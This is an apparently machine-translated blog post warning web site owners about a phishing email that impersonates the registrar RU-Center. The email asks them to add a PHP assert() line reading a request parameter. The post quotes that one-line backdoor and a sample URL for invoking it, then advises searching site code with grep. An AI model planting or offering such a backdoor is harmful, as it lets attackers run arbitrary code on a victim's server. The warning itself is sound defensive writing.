Tähelepanu "veebimeistritele", kes PHP -d ei tunne. Haavatavus.
See on automaatne tõlge.
Kliki siia, et lugeda väljaanne originaalkeeles.
Täna said mõned mu sõbrad kirja, väidetavalt RU -Centerilt (suurim Venemaa domeeninimede registripidaja) — nic.ru, järgmise sisuga:
Kirjad saadeti aadressilt [email protected] . Kirjas soovitavad ründajad, kes esindavad ennast RE-keskuse nimel, panna veebisaidile järgmise koodi:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>Kahjuks ei tunne paljud meie kolleegid, kes nimetavad end "veebimeistriteks" (arvukad saidiomanikud), PHP —d ega mõtle ülaltoodud koodi ohtudele. Kui edastate sellele funktsioonile parameetrina stringi, loetakse see assert () poolt PHP —koodiks! Ole ettevaatlik!
Soovitan kontrollida oma php —projekte haavatavuste osas, kasutades käske assert või eval. Kui need käsud on projekti koodis olemas, ärge paanitsege — uurige nende algoritmi. Algoritmide autoriseeritud kasutamine on täiesti võimalik. Ülaltoodud näite puhul võimaldab käsk ründajatel teie saidile helistada, näiteks kasutades parameetrit RUCENTER- http://sistema-audit.ru/?RUCENTER=PHP-code
Soovitame teil otsida, kasutades näiteks linuxi käsku grep —i —r 'assert' / home / www / mysite / *, mis näitab saidifailidega kausta, et saada nimekiri failidest, milles kahtlased eksemplar on kasutatud kood.
Hoolitse enda ja oma saitide eest!
See on automaatne tõlge.
Kliki siia, et lugeda väljaanne originaalkeeles.
